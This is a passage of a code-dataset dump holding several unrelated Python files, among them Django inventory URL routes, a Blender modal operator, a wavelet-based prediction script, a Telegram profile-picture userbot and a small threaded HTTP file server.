tf.compat.v1.where_v2(filter, forces_zeroes_tf, slice_forces, name=\"where_or\")\n forces = tf.math.reduce_sum(filtered, axis=0)\n return forces","sub_path":"many_particle/tf_ordinary_verlet/forces.py","file_name":"forces.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"126865068","text":"from django.conf.urls import url, include\n\nfrom . import views\n\n\nurlpatterns = [\n url(r'^adjustments/', include([\n url(r'^$', views.StockAdjustmentList.as_view(), name='stock-adjustment-list'),\n url(r'^create/$', views.StockAdjustmentCreate.as_view(), name='stock-adjustment-create'),\n url(r'^(?P<pk>[0-9]+)/', include([\n url(r'^$', views.StockAdjustmentDetail.as_view(), name='stock-adjustment-detail'),\n url(r'^update/$', views.StockAdjustmentUpdate.as_view(), name='stock-adjustment-update'),\n url(r'^delete/$', views.StockAdjustmentDelete.as_view(), name='stock-adjustment-delete'),\n ])),\n ])),\n url(r'^purchase_orders/', include([\n url(r'^$', views.PurchaseOrderList.as_view(), name='purchase-order-list'),\n url(r'^create/$', views.PurchaseOrderCreate.as_view(), name='purchase-order-create'),\n url(r'^(?P<pk>[0-9]+)/', include([\n url(r'^$', views.PurchaseOrderDetail.as_view(), name='purchase-order-detail'),\n url(r'^update/$', views.PurchaseOrderUpdate.as_view(), name='purchase-order-update'),\n url(r'^delete/$', views.PurchaseOrderDelete.as_view(), name='purchase-order-delete'),\n url(r'^shipment/$', views.POStockAdjustmentCreate.as_view(), name='po-stock-create'),\n url(r'^invoice/$', views.POInvoiceCreate.as_view(), name='po-invoice-create'),\n url(r'^reconcile/$', views.PurchaseOrderReconcile.as_view(), name='purchase-order-reconcile'),\n ])),\n ])),\n url(r'^invoices/', include([\n url(r'^$', views.InvoiceList.as_view(), name='invoice-list'),\n url(r'^create/$', views.InvoiceCreate.as_view(), name='invoice-create'),\n url(r'^(?P<pk>[0-9]+)/', include([\n url(r'^$', views.InvoiceDetail.as_view(), name='invoice-detail'),\n url(r'^update/$', views.InvoiceUpdate.as_view(), name='invoice-update'),\n url(r'^delete/$', views.InvoiceDelete.as_view(), name='invoice-delete'),\n ])),\n ])),\n url(r'^locations/', include([\n url(r'^store/$', views.StoreList.as_view(), name='store-list'),\n url(r'^store/(?P<pk>[0-9]+)/$', views.StoreDetail.as_view(), name='store-detail'),\n url(r'^warehouse/$', views.WarehouseList.as_view(), name='warehouse-list'),\n url(r'^warehouse/(?P<pk>[0-9]+)/', include([\n url(r'^$', views.WarehouseDetail.as_view(), name='warehouse-detail'),\n url(r'^setting$', views.WarehouseSetting.as_view(), name='warehouse-setting'),\n ])),\n ])),\n]\n","sub_path":"inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"35039711","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 26 14:07:44 2017\n\n@author: justinwu\n\"\"\"\nfor i in range(8,19):\n if(i%2==1):\n continue\n print(\"i的值:\",i)","sub_path":"for_a.py","file_name":"for_a.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"154313578","text":"'''\nCopyright (C) 2015 CG Cookie\nhttp://cgcookie.com\nhello@cgcookie.com\n\nCreated by Jonathan Denning, Jonathan Williamson, and Patrick Moore\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see <http://www.gnu.org/licenses/>.\n'''\n\nimport bpy\nimport bgl\nfrom bpy_extras.view3d_utils import location_3d_to_region_2d, region_2d_to_vector_3d\nfrom bpy_extras.view3d_utils import region_2d_to_location_3d, region_2d_to_origin_3d\nfrom mathutils import Vector, Matrix\nimport math\n\nfrom ..lib import common_utilities\nfrom ..lib.common_utilities import bversion, get_object_length_scale, dprint, frange, selection_mouse, showErrorMessage\nfrom ..lib.classes.profiler.profiler import Profiler\n\nclass loopslide_UI_Modal():\n\n def modal_wait(self, context, eventd):\n settings = common_utilities.get_settings()\n if eventd['press'] in self.keymap['confirm']:\n self.create_mesh(eventd['context'])\n return 'finish'\n\n if eventd['press'] in self.keymap['cancel']:\n return 'cancel'\n\n #####################################\n # General\n\n if eventd['press'] == 'LEFTMOUSE':\n if len(self.loopslide.vert_loop_vs) > 0:\n #print('SLIDE')\n return 'slide'\n \n elif eventd['type'] == 'MOUSEMOVE': #mouse movement/hovering\n #update brush and brush size\n self.hover_edge_pick(context,eventd,settings)\n return ''\n return ''\n \n def modal_slide(self,context,eventd):\n settings = common_utilities.get_settings()\n if eventd['press'] in self.keymap['action'] or eventd['press'] in self.keymap['confirm']:\n self.loopslide.calc_snaps(self.trg_bme, snap = True)\n self.loopslide.move_loop(self.trg_bme)\n self.loopslide.clear()\n return 'main'\n \n elif eventd['type'] in self.keymap['cancel'] | self.keymap['modal cancel']:\n self.loopslide.clear()\n return 'main'\n \n elif eventd['type'] == 'MOUSEMOVE':\n \n self.slide_update(context,eventd, settings)\n return ''\n ","sub_path":"op_loopslide/loopslide_ui_modal.py","file_name":"loopslide_ui_modal.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"93161359","text":"import SRMtool\nimport DT_WSE\nimport math,sys,time,random,xlsxwriter,copy\nimport numpy as np\nfrom scipy.optimize import minimize\n\n# 设置任务名\ntaskName = 'DS1_pre'\n# 设置待处理的数据\nfileName = 'C:\\\\xampp\\\\htdocs\\\\DS4.txt'\n# 设置参数文件\nparaFileName = 'C:\\\\xampp\\\\htdocs\\\\multi_para1.txt'\n\n# 设置Task所需依赖包\nlibFiles = ('SRMtool','DT_WSE')\n\n# 设置结果保存excel表的所有工作簿的名称元组\nworkbookNames = ('PredictionResult_3','PredictionStudy_3','PredictionResult_5','PredictionStudy_5','PredictionResult_7','PredictionStudy_7')\n\n# 设置每个工作簿内的列名元组\nPredictionResult_3 = ()\nPredictionStudy_3 = ('MSE1','MSE2','weightMethods','costMethods','costDataMethods','thresholdMethods','thresholdRules','dataTransforms','predictionIntervals','vares','bandwidth','fullName')\nPredictionResult_5 = ()\nPredictionStudy_5 = PredictionStudy_3\nPredictionResult_7 = ()\nPredictionStudy_7 = PredictionStudy_3\n# 将每个工作簿内的列名元组汇总为一个元组\nworkbookRawNames = (PredictionResult_3,PredictionStudy_3,PredictionResult_5,PredictionStudy_5,PredictionResult_7,PredictionStudy_7)\n\n#读取数据文件方法\ndef readDataFunction(dataFile):\n\to_data = SRMtool.getData(dataFile)\n\treturn (tuple(o_data),)\n\n#读取参数文件方法\ndef readParaFunction(ParaFile):\n\tparaTuple = SRMtool.multi_ReadParaFunction(ParaFile)\n\treturn paraTuple\n\n#Task方法\ndef taskFunction(dataTuple,paraTuple):\n\t#print(\"taskFunction6\")\n\t# 读取参数\n\tweightMethod = paraTuple[0]\n\tcostMethod = paraTuple[1]\n\tcostDataMethod = paraTuple[2]\n\tthresholdMethod = paraTuple[3]\n\tthresholdRule = paraTuple[4]\n\tdataTransform = paraTuple[5]\n\tpredictionInterval = paraTuple[6]\n\tvar = paraTuple[7]\n\t# 预准备,分割数据\n\to_data = list(dataTuple)\n\tgroupLength = len(o_data);\n\tpredictionPoint = math.floor(groupLength * predictionInterval);\n\tahead_data = o_data[0: predictionPoint];\n\tafter_data = o_data[predictionPoint: groupLength];\n\t# 开始计算\n\th = 1.1\n\tif(weightMethod == 'none'):\n\t\th = -1;\n\tif(dataTransform == 'TranslationInvariant'):\n\t\tvar = -1;\n\tresult = DT_WSE.costPrediction(ahead_data,costMethod,costDataMethod,weightMethod,h,groupLength - predictionPoint,dataTransform,thresholdRule,thresholdMethod,var);\n\t'''\n\t#加强版\n\tif(dataTransform == 'TranslationInvariant' and thresholdMethod == 'ut') or (dataTransform != 'TranslationInvariant' and thresholdMethod == 'ldt'):\n\t\tpass\n\telse:\n\t\tresult1 = result[predictionPoint: groupLength];\n\t\ti = 0;\n\t\tx0list = [] ## 空列表\n\t\twhile i < len(result1):\n\t\t\tx0list.append(result1[i])\n\t\t\ti = i + 1\n\t\tx0 = np.array(x0list)\n\t\targ = (ahead_data,'Fisz',thresholdRule,'ut','none',h,var)\n\t\tres = minimize(DT_WSE.prediction_cost3, x0,arg,method='nelder-mead',\n\t\t options={'xatol': 1e-8, 'disp': False})\n\t\ti = 0;\n\t\tfor re in res.x:\n\t\t\tresult[predictionPoint + i] = re;\n\t\t\ti = i + 1\n\t'''\n\t#分析结果\n\tahead = result[0 : predictionPoint];\n\tafter_result = result[predictionPoint: groupLength];\n\tparameterCombination = \"PredictionInterval:\"+str(predictionInterval)+\" \"+costMethod+\"_\"+costDataMethod+\"_\"+dataTransform+\"_\"+weightMethod+\"_\"+thresholdRule+\"_\"+thresholdMethod+\"_var=\"+str(var)+\"_h=\"+str(h)\n\tmse1 = SRMtool.MSE(after_data,after_result);\n\tmse2 = SRMtool.MSE(SRMtool.toCulData(after_data),SRMtool.toCulData(after_result));\n\tPredictionStudyTuple = (mse1,mse2)+paraTuple+(h,parameterCombination)\n\tPredictionResultTuple = (result,parameterCombination)\n\treturn (PredictionResultTuple,PredictionStudyTuple,predictionInterval)\n\n#结果保存方法\ndef saveFunction(taskResultTuple):\n\t#保存分析结果(接TaskFunction)\n\tpredictionInterval = taskResultTuple[2]\n\tif(predictionInterval == 0.3):\n\t\tworkbookNum = 0\n\tif(predictionInterval == 0.5):\n\t\tworkbookNum = 1\n\tif(predictionInterval == 0.7):\n\t\tworkbookNum = 2\n\t#第二个参数为False时,表示写入一列数据(从第一列起,纵向写入),此时需指定列名.应由第四个元素给出.\n\tPredictionResultTuple = (workbookNum * 2,False,taskResultTuple[0][0],taskResultTuple[0][1])\n\t#第二个参数为True时,表示写入一行数据(从第二行开始写起,不用指定列名)\n\tPredictionStudyTuple = (workbookNum * 2 + 1,True,taskResultTuple[1])\n\n\tthresholdMethod = taskResultTuple[1][5]\n\tdataTransform = taskResultTuple[1][7]\n\t#print(thresholdMethod+\" \"+dataTransform)\n\tif(dataTransform == 'TranslationInvariant' and thresholdMethod == 'ut') or (dataTransform != 'TranslationInvariant' and thresholdMethod == 'ldt'):\n\t\t#print(\"违法的组合\")\n\t\treturn ()\n\treturn (PredictionResultTuple,PredictionStudyTuple)\n\n#若不满意系统提供的结果保存框架或其他,亦可自行处理\ndef finialCust(excelFileName,taskResultTuples):\n\t#print(\"这里是finalCust\")\n\t# 设定数据集名称\n\tdataName = \"DS6\"\n\tmodelName = \"q1N\"\n\t# 创建excel文件\n\tdesktop_path = sys.path[0]+\"/excel_save/\"\n\tfileName = \"汇总All_\"+excelFileName +'_'+str(int(time.time()))+str(random.randint(0,9999))+ \".xlsx\"\n\tdesktop_path = desktop_path + fileName;\n\tworkbook = xlsxwriter.Workbook(desktop_path)\n\tworksheet = workbook.add_worksheet(\"AllPara\")\n\tmse_format = workbook.add_format({\n 'align': 'center', # 水平对齐方式\n 'valign': 'vcenter', # 垂直对齐方式\n })\n\tcell_format = workbook.add_format({\n 'align': 'center', # 水平对齐方式\n 'valign': 'vcenter', # 垂直对齐方式\n 'num_format': '0%'\n })\n\n\tbookNames = ('weightMethods','costMethods','costDataMethods','thresholdMethods','thresholdRules','dataTransforms','vares')\n\tparaLists = []\n\ti = 0 # 控制内循环中计算第i项参数的最小mse值\n\tj = 0 # 控制外循环中记录到了第j行\n\tfor bookName in bookNames:\n\t\tnameList = []\n\t\tminValueList = []\n\t\t#paraList = dict()\n\t\tparaList = []\n\t\t# 跳过第七项,因为第七项是predictionInterval\n\t\tif(i == 6):\n\t\t\ti = 7\n\t\tpreList = []\n\t\t# 重组数据\n\t\tfor taskResultTuple in taskResultTuples:\n\t\t\tparaTuple = taskResultTuple[1]\n\t\t\tmse2 = paraTuple[1]\n\t\t\t# 读取参数\n\t\t\tweightMethod = paraTuple[0+2]\n\t\t\tcostMethod = paraTuple[1+2]\n\t\t\tcostDataMethod = paraTuple[2+2]\n\t\t\tthresholdMethod = paraTuple[3+2]\n\t\t\tthresholdRule = paraTuple[4+2]\n\t\t\tdataTransform = paraTuple[5+2]\n\t\t\tpredictionInterval = paraTuple[6+2]\n\t\t\tvar = paraTuple[7+2]\n\t\t\t# 排除非法参数组合\n\t\t\tif(dataTransform == 'TranslationInvariant' and thresholdMethod == 'ut') or (dataTransform != 'TranslationInvariant' and thresholdMethod == 'ldt'):\n\t\t\t\tcontinue \n\t\t\tdictPara = dict()\n\t\t\tdictPara[\"para\"] = paraTuple[i+2]\n\t\t\tdictPara[\"predictionPoint\"] = predictionInterval\n\t\t\tdictPara[\"mse\"] = mse2\n\t\t\tparaList.append(dictPara)\n\n\t\t# 记录参数名\n\t\t# worksheet.write(j,0,bookName);\n\t\tmergeStr = 'A'+str(j+1)+':'+'E'+str(j+1)\n\t\tworksheet.merge_range(mergeStr, bookName, mse_format)\n\t\t# 对数据进行排序\n\t\tprint(str(taskResultTuples[0][1][i+2])+\" 开始排序\")\n\t\tl = sorted(paraList, key=lambda x:(x['predictionPoint'], x['para'], x['mse']))\n\t\tcol = 0\n\t\traw = 1\n\t\tnowPredictionPoint = l[0][\"predictionPoint\"]\n\t\tnowPara = l[0][\"para\"]\n\t\tworksheet.write(j+1,2+col,nowPredictionPoint,cell_format)\n\t\tworksheet.write(j+1+raw,2+col,l[0][\"mse\"],mse_format)\n\t\tworksheet.write(j+1+raw,1,l[0][\"para\"],mse_format)\n\t\tworksheet.write(j+1+raw,0,dataName,mse_format)\n\t\tfor x in l:\n\t\t\tif(x[\"predictionPoint\"] != nowPredictionPoint):\n\t\t\t\tnowPara = x[\"para\"]\n\t\t\t\tnowPredictionPoint = x[\"predictionPoint\"]\n\t\t\t\tcol = col + 1\n\t\t\t\traw = 1\n\t\t\t\tworksheet.write(j+1,2+col,nowPredictionPoint,cell_format)\n\t\t\t\tworksheet.write(j+1+raw,2+col,x[\"mse\"],mse_format)\n\t\t\t\t#worksheet.write(j+1+raw,1,x[\"para\"],mse_format)\n\t\t\telif(x[\"para\"] != nowPara):\n\t\t\t\tnowPara = x[\"para\"]\n\t\t\t\traw = raw + 1\n\t\t\t\t#print(str(j+1+raw)+\",\"+str(2+col)+\":\"+str(x[\"mse\"]))\n\t\t\t\tworksheet.write(j+1+raw,2+col,x[\"mse\"],mse_format)\n\t\t\t\tworksheet.write(j+1+raw,1,x[\"para\"],mse_format)\n\t\tj = j + raw + 3\n\t\ti = i + 1\n\t# 记录所有组合中的最好成绩\n\t# 记录参数名\n\t# worksheet.write(j,0,bookName);\n\tmergeStr = 'A'+str(j+1)+':'+'E'+str(j+1)\n\tworksheet.merge_range(mergeStr, 'BestMSE', mse_format)\n\t# 对数据进行排序\n\tprint(\"最好成绩排序\")\n\tl = sorted(paraList, key=lambda x:(x['predictionPoint'], x['mse']))\n\tcol = 0\n\traw = 1\n\tnowPredictionPoint = l[0][\"predictionPoint\"]\n\tworksheet.write(j+1,2+col,nowPredictionPoint,cell_format)\n\tworksheet.write(j+1+raw,2+col,l[0][\"mse\"],mse_format)\n\tworksheet.write(j+1+raw,1,modelName,mse_format)\n\tworksheet.write(j+1+raw,0,dataName,mse_format)\n\tfor x in l:\n\t\tif(x[\"predictionPoint\"] != nowPredictionPoint):\n\t\t\tnowPara = x[\"para\"]\n\t\t\tnowPredictionPoint = x[\"predictionPoint\"]\n\t\t\tcol = col + 1\n\t\t\traw = 1\n\t\t\tworksheet.write(j+1,2+col,nowPredictionPoint,cell_format)\n\t\t\tworksheet.write(j+1+raw,2+col,x[\"mse\"],mse_format)\n\tworkbook.close();\n\n\t\n\n#-------------------------------------------------------------------------#\n#python c:\\\\xampp\\\\htdocs\\\\multi_DTWSE.py\n\n'''\n\n# 设置待处理的数据\nfileName = 'C:\\\\xampp\\\\htdocs\\\\DS1.txt'\ndataTuples = readDataFunction(fileName)\n# 设置参数文件\nparaFileName = 'C:\\\\xampp\\\\htdocs\\\\multi_para2.txt'\nparaTuples = readParaFunction(paraFileName)\nprint(paraTuples)\n# 运行一个Task\nparaTuple = paraTuples[0]\ndataTuple = dataTuples[0]\nresTuple = taskFunction(dataTuple,paraTuple)\n# 计算结果转换为数据记录指令\nsaveTuple = saveFunction(resTuple)\n\nprint(saveTuple[0])\nprint(saveTuple[1])\n\n'''\n\n\n\n\n\n","sub_path":"tool/Server/2020_10/1602242237654/multi_DTWSE.py","file_name":"multi_DTWSE.py","file_ext":"py","file_size_in_byte":9349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"94663984","text":"import configparser\nfrom pathlib import Path\n\nDB_CONFIG_FILE_NAME_PATTERN = \"db_config.*.ini\"\ndb_config_dir_path = Path(Path(__file__), \"../../../config\").resolve()\n\n\ndef get_db_config_file_name_help():\n more_info = (\n \"There are no usable database config files under the 'config' directory. \"\n + \"The name of a database config file should follow the '{}' pattern.\"\n ).format(DB_CONFIG_FILE_NAME_PATTERN)\n file_names = get_available_db_config_file_names()\n if file_names:\n more_info = \"The available names is/are: {}\".format(\", \".join(file_names))\n return \"The database configuration file name. \" + more_info\n\n\ndef get_db_connection_parameters(db_config_file_name):\n file_path = Path(db_config_dir_path, \"./\", db_config_file_name).resolve()\n config_parser = configparser.ConfigParser()\n config_parser.read(file_path)\n connection_parameters_section = config_parser[\"ConnectionParameters\"]\n\n return {\n \"host\": connection_parameters_section.get(\"host\"),\n \"database\": connection_parameters_section.get(\"database\"),\n \"user\": connection_parameters_section.get(\"user\"),\n \"password\": connection_parameters_section.get(\"password\"),\n \"time_zone\": connection_parameters_section.get(\"time_zone\"),\n }\n\n\ndef get_available_db_config_file_names():\n file_paths = sorted(db_config_dir_path.glob(DB_CONFIG_FILE_NAME_PATTERN))\n names = []\n for file_path in file_paths:\n names.append(file_path.name)\n return names","sub_path":"lib/utils/db_config.py","file_name":"db_config.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"580595133","text":"from argparse import Namespace\nfrom gooey import GooeyParser\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom .mrcnn.config import Config\nfrom .fix_validator import fix_validator\n\nMODEL_DIR = Path(\"checkpoint/Mask_RCNN/\")\n\n\ndef build_config_parser(\n parser: GooeyParser = GooeyParser(description='Build Option'),\n config: Config = Config(),\n modifiable: bool = True,\n ) -> GooeyParser:\n\n parser.add_argument(\n '--num_classes',\n type=eval,\n metavar=\"Classes\",\n help=\"Number of classes (including background).\",\n default=config.NUM_CLASSES,\n gooey_options=({} if modifiable else\n fix_validator(config.NUM_CLASSES))\n )\n\n backbone_parser = parser.add_argument_group(\n 'Backbone')\n\n backbone_parser.add_argument(\n '--backbone',\n choices=['resnet50', 'resnet101'],\n metavar='Backbone',\n help='Backbone network architecture',\n default=config.BACKBONE,\n gooey_options=({} if modifiable else\n fix_validator(config.BACKBONE))\n )\n\n rpn_parser = parser.add_argument_group(\n 'RPN',\n 'Region Proposal Network',\n )\n\n rpn_parser.add_argument(\n '--rpn_anchor_scales',\n type=eval,\n metavar='RPN Anchor Scales',\n default=config.RPN_ANCHOR_SCALES,\n help='Length of square anchor side in pixels',\n gooey_options=({} if modifiable else\n fix_validator(config.RPN_ANCHOR_SCALES))\n )\n\n log_parser = parser.add_argument_group(\n 'Log',\n \"Show and Save model options\",\n gooey_options={'show_border': True, 'columns': 4}\n )\n log_parser.add_argument(\n \"--print-model-summary\", action='store_true',\n )\n log_parser.add_argument(\n \"--log-dir\", type=str,\n metavar=\"Log Directory Path\",\n default=(MODEL_DIR.joinpath('untitled')\n if config.NAME is None\n else MODEL_DIR.joinpath(str(config.NAME))),\n help='{}{}TIME{}/'.format(\n MODEL_DIR.joinpath('LOG_NAME'),\n '{', '}')\n )\n # show_and_save_parser.add_argument(\n # \"--save-path\", type=str,\n # metavar=\"File path\",\n # default=\"model.h5\",\n # help=\"model name to save model\",\n # )\n # show_and_save_parser.add_argument(\n # \"--save-file\", type=str,\n # metavar=\"Overwrite File\",\n # help=\"model name to save model\",\n # widget=\"FileChooser\",\n # )\n\n return parser\n\n\ndef build_config(args: Namespace) -> Config:\n class BuildConfig(Config):\n NAME = Path(args.log_dir).name\n\n NUM_CLASSES = args.num_classes\n\n BACKBONE = args.backbone\n\n RPN_ANCHOR_SCALES = args.rpn_anchor_scales\n\n def __init__(self):\n super(BuildConfig, self).__init__()\n\n return BuildConfig()\n","sub_path":"model/Mask_RCNN/build_config.py","file_name":"build_config.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"472860534","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 15 22:40:48 2018\n\n@author: rupert\n\"\"\"\n\nfd=open(\"testpattern3.lines\",'w')\ny=20\nfor i in range(100):\n fd.write(\"%f %f %f %f\\n\"%(i,y,i,-y))\n y*=-1\nfd.close()\n","sub_path":"PlotterTests/testpattern3.py","file_name":"testpattern3.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"177133675","text":"\"\"\"\nTime In Profile Pic.....\nCommand: `.bloom`\n\nHmmmm U need to config RAVANA_LEELA var in Heroku with any telegraph image link\n\n:::::Credit Time::::::\n1) Coded By: @s_n_a_p_s\n2) Ported By: @r4v4n4 (Noodz Lober)\n3) End Game Help By: @spechide\n4) Better Colour Profile Pic By @PhycoNinja13b\n\n#curse: who ever edits this credit section will goto hell\n\n⚠️DISCLAIMER⚠️\n\nUSING THIS PLUGIN CAN RESULT IN ACCOUNT BAN. WE DONT CARE ABOUT BAN, SO WE ARR USING THIS.\n\"\"\"\nimport os\nfrom datetime import datetime\nfrom PIL import Image, ImageDraw, ImageFont\nfrom pySmartDL import SmartDL\nfrom telethon.tl import functions\nfrom uniborg.util import admin_cmd\nimport asyncio\nimport shutil \nimport random\n\nFONT_FILE_TO_USE = \"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\"\n\n@borg.on(admin_cmd(pattern=\"bloom ?(.*)\"))\nasync def autopic(event): \n await event.edit(\"Bloom colour profile pic have been enabled © @R4V4N4\") \n downloaded_file_name = \"./ravana/original_pic.png\"\n downloader = SmartDL(Config.RAVANA_LEELA, downloaded_file_name, progress_bar=True)\n downloader.start(blocking=False)\n photo = \"photo_pfp.png\"\n while not downloader.isFinished():\n place_holder = None\n\n while True:\n #RIP Danger zone Here no editing here plox\n R = random.randint(0,256)\n B = random.randint(0,256)\n G = random.randint(0,256)\n FR = (256 - R) \n FB = (256 - B) \n FG = (256 - G) \n shutil.copy(downloaded_file_name, photo)\n image = Image.open(photo)\n image.paste( (R, G, B), [0,0,image.size[0],image.size[1]])\n image.save(photo)\n \n #Edit only Below part 🌚 Or esle u will be responsible 🤷‍♂\n current_time = datetime.now().strftime(\"\\n Time: %H:%M:%S \\n \\n Date: %d/%m/%y\")\n img = Image.open(photo)\n drawn_text = ImageDraw.Draw(img)\n fnt = ImageFont.truetype(FONT_FILE_TO_USE, 60)\n ofnt = ImageFont.truetype(FONT_FILE_TO_USE, 250)\n drawn_text.text((200, 400), current_time, font=fnt, fill=(FR,FG,FB))\n drawn_text.text((250, 250), \" 😈\", font = ofnt, fill=(FR,FG,FB))\n img.save(photo)\n file = await event.client.upload_file(photo) # pylint:disable=E0602\n try:\n await event.client(functions.photos.UploadProfilePhotoRequest( # pylint:disable=E0602\n file\n ))\n os.remove(photo)\n await asyncio.sleep(20)\n except:\n return\n","sub_path":"userbot/plugins/Bloom.py","file_name":"Bloom.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"254882176","text":"import mimetypes\nimport os\nimport socket\nimport typing\n\nfrom request import Request\nfrom response import Response\nfrom threading import Thread\nfrom queue import Queue, Empty\n\nSERVER_ROOT = \"www\"\n\n\ndef serve_file(sock: socket.socket, path: str) -> None:\n \"\"\"Given a socket and the relative path to a file (relative to\n SERVER_ROOT), send that file to the socket if it exists. If the\n file doesn't exist, send a \"404 Not Found\" response.\n \"\"\"\n if path == \"/\":\n path = \"/index.html\"\n\n abspath = os.path.normpath(os.path.join(SERVER_ROOT, path.lstrip(\"/\")))\n if not abspath.startswith(SERVER_ROOT):\n response = Response(status=\"404 Not Found\", content=\"Not Found\")\n response.send(sock)\n return\n\n try:\n with open(abspath, \"rb\") as f:\n content_type, encoding = mimetypes.guess_type(abspath)\n if content_type is None:\n content_type = \"application/octet-stream\"\n\n if encoding is not None:\n content_type += f\"; charset={encoding}\"\n\n response = Response(status=\"200 OK\", body=f)\n response.headers.add(\"content-type\", content_type)\n response.send(sock)\n return\n except FileNotFoundError:\n response = Response(status=\"404 Not Found\", content=\"Not Found\")\n response.send(sock)\n return\n\n\nclass HTTPWorker(Thread):\n def __init__(self, connection_queue: Queue) -> None:\n super().__init__(daemon=True)\n\n self.connection_queue = connection_queue\n self.running = False\n\n def stop(self) -> None:\n self.running = False\n\n def run(self) -> None:\n self.running = True\n while self.running:\n try:\n client_sock, client_addr = self.connection_queue.get(timeout=1)\n except Empty:\n continue\n\n try:\n self.handle_client(client_sock, client_addr)\n except Exception as e:\n print(f\"Unhandled error: {e}\")\n continue\n finally:\n self.connection_queue.task_done()\n\n def handle_client(self, client_sock: socket.socket, client_addr: typing.Tuple[str, int]) -> None:\n with client_sock:\n try:\n request = Request.from_socket(client_sock)\n if \"100-continue\" in request.headers.get(\"expect\", \"\"):\n response = Response(status=\"100 Continue\")\n response.send(client_sock)\n\n try:\n content_length = int(request.headers.get(\"content-length\", \"0\"))\n except ValueError:\n content_length = 0\n\n if content_length:\n body = request.body.read(content_length)\n print(\"Request body\", body)\n\n if request.method != \"GET\":\n response = Response(status=\"405 Method Not Allowed\", content=\"Method Not Allowed\")\n response.send(client_sock)\n return\n\n serve_file(client_sock, request.path)\n except Exception as e:\n print(f\"Failed to parse request: {e}\")\n response = Response(status=\"400 Bad Request\", content=\"Bad Request\")\n response.send(client_sock)\n\n\nclass HTTPServer:\n def __init__(self, host=\"127.0.0.1\", port=9000, worker_count=16) -> None:\n self.host = host\n self.port = port\n self.worker_count = worker_count\n self.worker_backlog = worker_count * 8\n self.connection_queue = Queue(self.worker_backlog)\n\n def serve_forever(self) -> None:\n workers = []\n for _ in range(self.worker_count):\n worker = HTTPWorker(self.connection_queue)\n worker.start()\n workers.append(worker)\n\n with socket.socket() as server_sock:\n server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_sock.bind((self.host, self.port))\n server_sock.listen(self.worker_backlog)\n print(f\"Listening on {self.host}:{self.port}...\")\n\n while True:\n try:\n # client_sock, client_addr = server_sock.accept()\n self.connection_queue.put(server_sock.accept())\n except KeyboardInterrupt:\n break\n\n for worker in workers:\n worker.stop()\n\n for worker in workers:\n worker.join(timeout=30)\n\n\nserver = HTTPServer()\nserver.serve_forever()\n","sub_path":"part_02/web-app-from-scratch/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"547809660","text":"import argparse\nimport time\nfrom models import ImagenetRunConfig\nfrom nas_manager import ProgressiveArchSearchConfig\nfrom models import Cifar10RunConfig\nfrom nas_manager import *\nfrom models.super_nets.super_progressive import Cifar10SuperProgressiveNASNets as SuperProgressiveNASNets\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--path', type=str, default='Cifar10_EXP/%s' % time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))\nparser.add_argument('--gpu', help='gpu available', default='0,1,2,3')\nparser.add_argument('--resume', action='store_true')\nparser.add_argument('--manual_seed', default=0, type=int)\n\n\"\"\" run config \"\"\"\nparser.add_argument('--n_epochs', type=int, default=5, help='how many epoches each layer to be trained')\nparser.add_argument('--init_lr', type=float, default=0.025)\nparser.add_argument('--lr_schedule_type', type=str, default='cosine')\nparser.add_argument('--dataset', type=str, default='cifar10', choices=['imagenet', 'cifar10'])\nparser.add_argument('--resize_to_224', action='store_true', help='resize cifar10 img to 224x224')\nparser.add_argument('--train_batch_size', type=int, default=64)\nparser.add_argument('--test_batch_size', type=int, default=128)\nparser.add_argument('--valid_size', type=int, default=None)\nparser.add_argument('--resize_scale', type=float, default=0.08)\nparser.add_argument('--distort_color', type=str, default='normal', choices=['normal', 'strong', 'None'])\nparser.add_argument('--cutout', action='store_true')\nparser.add_argument('--cutout_length', type=int, default=16)\nparser.add_argument('--opt_type', type=str, default='sgd', choices=['sgd'])\nparser.add_argument('--momentum', type=float, default=0.9) # opt_param\nparser.add_argument('--no_nesterov', action='store_true') # opt_param\nparser.add_argument('--weight_decay', type=float, default=4e-5)\nparser.add_argument('--label_smoothing', type=float, default=0.1)\nparser.add_argument('--no_decay_keys', type=str, default=None, choices=[None, 'bn', 'bn#bias'])\nparser.add_argument('--low_lr_parts', type=str, default=None, choices=[None, 'determined']) # !!!!!!!!!!!!!!!!!!!!!!\nparser.add_argument('--model_init', type=str, default='he_fout', choices=['he_fin', 'he_fout'])\nparser.add_argument('--init_div_groups', 